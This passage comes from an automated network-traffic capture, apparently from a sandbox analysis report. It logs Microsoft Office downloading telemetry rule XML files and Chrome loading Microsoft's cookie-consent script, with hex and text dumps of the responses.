                                                                                                                                                                                        x-ms-request-id: 2151d667-701e-0021-3e0f-3d3d45000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011349Z-178bfbc474bv587zhC1NYCny5w00000005700000000029df
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:49 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        74192.168.2.54980213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:50 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                        x-ms-request-id: 390d82dd-f01e-0071-4371-3c431c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-174c587ffdf9xbcchC1TEBxkz400000003m0000000009yd0
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:51 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        75192.168.2.54980313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:50 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                        x-ms-request-id: 3b3ce442-a01e-001e-3708-3d49ef000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-178bfbc474bmqmgjhC1NYCy16c000000057000000000m9dc
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        76192.168.2.54980413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:50 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                        x-ms-request-id: 606a4207-501e-005b-157e-3bd7f7000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-174c587ffdfcj798hC1TEB9bq400000003vg00000000egm8
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:51 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        77192.168.2.54980613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:51 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                        x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-174c587ffdfb5q56hC1TEB04kg00000003sg000000000406
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:51 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        78192.168.2.54980713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:51 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                        x-ms-request-id: 5f785e56-701e-0053-0854-3c3a0a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-178bfbc474bp8mkvhC1NYCzqnn000000052000000000cfwu
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:51 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        79192.168.2.54981013.107.246.634434276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:51 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        2024-11-24 01:13:52 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:51 GMT
                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                        Age: 22097
                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                        x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                        x-azure-ref: 20241124T011351Z-15b8b599d88m7pn7hC1TEB4axw00000003r000000000ey7g
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:52 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                        2024-11-24 01:13:52 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                        2024-11-24 01:13:52 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                        2024-11-24 01:13:52 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                        Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                        2024-11-24 01:13:52 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                        Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        80192.168.2.54981113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:52 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:53 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                        x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011353Z-178bfbc474brk967hC1NYCfu60000000050g00000000dzxz
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
